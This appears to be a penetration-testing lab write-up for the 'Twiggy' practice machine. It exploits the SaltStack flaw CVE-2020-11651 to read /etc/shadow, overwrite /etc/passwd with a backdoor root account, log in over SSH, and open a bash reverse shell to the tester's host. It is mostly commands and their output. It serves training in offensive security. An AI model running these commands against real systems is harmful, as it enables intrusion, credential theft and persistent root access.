InfoSec LAB

Twiggy_Exploitation

Created: 4 min read

CVE-2020-11651

The target system has been identified to be vulnerable to CVE-2020-11651 due to the use of an outdated instance of SaltStack API

┌──(.venv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/twiggy]
└─$ python3 CVE-2020-11651-poc/exploit.py --master $IP --read /etc/shadow
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
/home/kali/PEN-200/PG_PRACTICE/twiggy/CVE-2020-11651-poc/.venv/lib/python3.13/site-packages/salt/transport/client.py:28: DeprecationWarning: This module is deprecated. Please use salt.channel.client instead.
  warn_until(
[+] Checking salt-master (192.168.113.62:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: MM+k7kuD8qK7uY/FCqn+L+gPc6ScqcoJBfVShUUA3KGay3i/woG7skNXpMmON4009lLtSZ9DRlk=
[+] Attemping to read /etc/shadow from 192.168.113.62
root:$6$WT0RuvyM$WIZ6pBFcP7G4pz/jRYY/LBsdyFGIiP3SLl0p32mysET9sBMeNkDXXq52becLp69Q/Uaiu8H0GxQ31XjA8zImo/:18400:0:99999:7:::
bin:*:17834:0:99999:7:::
daemon:*:17834:0:99999:7:::
adm:*:17834:0:99999:7:::
lp:*:17834:0:99999:7:::
sync:*:17834:0:99999:7:::
shutdown:*:17834:0:99999:7:::
halt:*:17834:0:99999:7:::
mail:*:17834:0:99999:7:::
operator:*:17834:0:99999:7:::
games:*:17834:0:99999:7:::
ftp:*:17834:0:99999:7:::
nobody:*:17834:0:99999:7:::
systemd-network:!!:18400::::::
dbus:!!:18400::::::
polkitd:!!:18400::::::
sshd:!!:18400::::::
postfix:!!:18400::::::
chrony:!!:18400::::::
mezz:!!:18400::::::
nginx:!!:18400::::::
named:!!:18400::::::

Executing the exploit script to read the /etc/shadow file on the target system It would appear that the current process is running with privileges of the root account.

Overwriting /etc/passwd

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/twiggy]
└─$ openssl passwd qwe123                
$1$.VyKllmX$wQ7Vros5MazgN9ZAXe0nA.
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/twiggy]
└─$ cat fake_passwd               
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
mezz:x:997:995::/home/mezz:/bin/false
nginx:x:996:994:Nginx web server:/var/lib/nginx:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
r00t:$1$.VyKllmX$wQ7Vros5MazgN9ZAXe0nA.:0:0:root:/root:/bin/bash

Creating a passwd file that contains another root account; r00t

┌──(.venv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/twiggy]
└─$ python3 CVE-2020-11651-poc/exploit.py --master $IP --upload-src ./fake_passwd --upload-dest ../../../../etc/passwd
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
/home/kali/PEN-200/PG_PRACTICE/twiggy/CVE-2020-11651-poc/.venv/lib/python3.13/site-packages/salt/transport/client.py:28: DeprecationWarning: This module is deprecated. Please use salt.channel.client instead.
  warn_until(
[+] Checking salt-master (192.168.113.62:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: MM+k7kuD8qK7uY/FCqn+L+gPc6ScqcoJBfVShUUA3KGay3i/woG7skNXpMmON4009lLtSZ9DRlk=
[+] Attemping to upload ./fake_passwd to ../../../../etc/passwd on 192.168.113.62
[ ] Wrote data to file /srv/salt/../../../../etc/passwd

Overwriting the fake_passwd to the /etc/passwd file of the target system

┌──(.venv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/twiggy]
└─$ python3 CVE-2020-11651-poc/exploit.py --master $IP --read /etc/passwd               
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
/home/kali/PEN-200/PG_PRACTICE/twiggy/CVE-2020-11651-poc/.venv/lib/python3.13/site-packages/salt/transport/client.py:28: DeprecationWarning: This module is deprecated. Please use salt.channel.client instead.
  warn_until(
[+] Checking salt-master (192.168.113.62:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: MM+k7kuD8qK7uY/FCqn+L+gPc6ScqcoJBfVShUUA3KGay3i/woG7skNXpMmON4009lLtSZ9DRlk=
[+] Attemping to read /etc/passwd from 192.168.113.62
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
mezz:x:997:995::/home/mezz:/bin/false
nginx:x:996:994:Nginx web server:/var/lib/nginx:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
r00t:$1$.VyKllmX$wQ7Vros5MazgN9ZAXe0nA.:0:0:root:/root:/bin/bash

Upload confirmed. The /etc/passwd file of the target system has been overwritten with the fake_passwd file

SSH

┌──(.venv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/twiggy]
└─$ ssh r00t@$IP                                           
The authenticity of host '192.168.113.62 (192.168.113.62)' can't be established.
ED25519 key fingerprint is SHA256:uYMZFN9vYkxFeoZ23/Znor6lCrABMH4HLFk4qNAIkB4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.113.62' (ED25519) to the list of known hosts.
r00t@192.168.113.62's password: qwe123
[root@twiggy ~]# whoami
root
[root@twiggy ~]# hostnamee
-bash: hostnamee: command not found
[root@twiggy ~]# hostname 
twiggy
[root@twiggy ~]# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:6d:a0 brd ff:ff:ff:ff:ff:ff
    inet 192.168.113.62/24 brd 192.168.113.255 scope global ens160
       valid_lft forever preferred_lft forever

Initial Foothold established to the target system as the root account via exploiting CVE-2020-11651 System level compromise

Code Execution

┌──(.venv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/twiggy]
└─$ python3 CVE-2020-11651-poc/exploit.py --master $IP --exec 'bash -i >& /dev/tcp/192.168.45.192/8000 0>&1'
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
/home/kali/PEN-200/PG_PRACTICE/twiggy/CVE-2020-11651-poc/.venv/lib/python3.13/site-packages/salt/transport/client.py:28: DeprecationWarning: This module is deprecated. Please use salt.channel.client instead.
  warn_until(
[+] Checking salt-master (192.168.113.62:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: MM+k7kuD8qK7uY/FCqn+L+gPc6ScqcoJBfVShUUA3KGay3i/woG7skNXpMmON4009lLtSZ9DRlk=
/home/kali/PEN-200/PG_PRACTICE/twiggy/CVE-2020-11651-poc/exploit.py:351: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  jid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow())
[+] Attemping to execute bash -i >& /dev/tcp/192.168.45.192/8000 0>&1 on 192.168.113.62
[+] Successfully scheduled job: 20250311002527945322

Executing the exploit script with a reverse shell payload

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/twiggy]
└─$ nnc 8000
listening on [any] 8000 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.113.62] 54114
bash: no job control in this shell
[root@twiggy root]# whoami
whoami
root
[root@twiggy root]# hostname
hostname
twiggy
[root@twiggy root]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:65:1e brd ff:ff:ff:ff:ff:ff
    inet 192.168.113.62/24 brd 192.168.113.255 scope global ens160
       valid_lft forever preferred_lft forever

System level compromise

Interactive Graph View

Backlinks